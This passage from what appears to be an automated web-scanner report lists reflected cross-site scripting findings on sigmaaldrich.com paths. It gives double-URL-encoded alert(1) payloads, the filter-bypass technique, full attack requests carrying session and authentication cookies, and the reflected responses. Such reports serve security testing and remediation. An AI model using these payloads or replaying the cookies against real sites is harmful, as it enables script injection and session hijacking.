Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:47 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich93003";alert(1)//68f2c0b52/social/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.491. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc581%2522%253balert%25281%2529%252f%252ff0308a4b9 was submitted in the REST URL parameter 4. This input was echoed as dc581";alert(1)//f0308a4b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/socialdc581%2522%253balert%25281%2529%252f%252ff0308a4b9/youtube-25x25 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/socialdc581";alert(1)//f0308a4b9/youtube-25x25","E404") ;
   </script>
...[SNIP]...

1.492. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/social/youtube-25x25 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/social/youtube-25x25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7800c%2522%253balert%25281%2529%252f%252f6b8293069f5 was submitted in the REST URL parameter 5. This input was echoed as 7800c";alert(1)//6b8293069f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/social/youtube-25x257800c%2522%253balert%25281%2529%252f%252f6b8293069f5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:53 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/social/youtube-25x257800c";alert(1)//6b8293069f5","E404") ;
   </script>
...[SNIP]...

1.493. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eae19%2522%253balert%25281%2529%252f%252ffd28aef77b3 was submitted in the REST URL parameter 1. This input was echoed as eae19";alert(1)//fd28aef77b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etceae19%2522%253balert%25281%2529%252f%252ffd28aef77b3/medialib/sigma-aldrich/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etceae19";alert(1)//fd28aef77b3/medialib/sigma-aldrich/splash-hex","E404") ;
   </script>
...[SNIP]...

1.494. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00a7%2522%253balert%25281%2529%252f%252f0ec43bcc0ed was submitted in the REST URL parameter 2. This input was echoed as f00a7";alert(1)//0ec43bcc0ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf00a7%2522%253balert%25281%2529%252f%252f0ec43bcc0ed/sigma-aldrich/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:31 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf00a7";alert(1)//0ec43bcc0ed/sigma-aldrich/splash-hex","E404") ;
   </script>
...[SNIP]...

1.495. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c0fa%2522%253balert%25281%2529%252f%252f12241bca07a was submitted in the REST URL parameter 3. This input was echoed as 3c0fa";alert(1)//12241bca07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich3c0fa%2522%253balert%25281%2529%252f%252f12241bca07a/splash-hex HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
